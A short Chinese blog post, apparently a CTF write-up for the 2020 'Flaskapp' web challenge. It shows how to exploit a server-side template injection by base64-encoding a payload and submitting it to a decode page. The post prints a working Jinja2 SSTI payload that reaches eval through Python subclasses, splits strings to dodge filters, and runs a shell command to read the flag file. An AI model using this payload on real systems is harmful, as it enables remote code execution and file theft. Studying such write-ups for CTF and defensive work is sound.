模板注入漏洞,在base64解码页面上,先加密payload
{{{}.__class__.__base__.__subclasses__()[103].__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort_"+"_('o"+"s').po"+"pen('cat this_is_the_fl"+"ag.txt').read()")}}
然后复制加密后的字符串到解码页面,得到flag
刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2020年02月23日
2020年新春战“疫”—网络安全公益赛 Web Flaskapp Writeup(base64解码ssti)
作者:admin , 分类:CTF , 浏览:489 , 评论:0
- 搜索
- 文章归档
- 友情链接
-
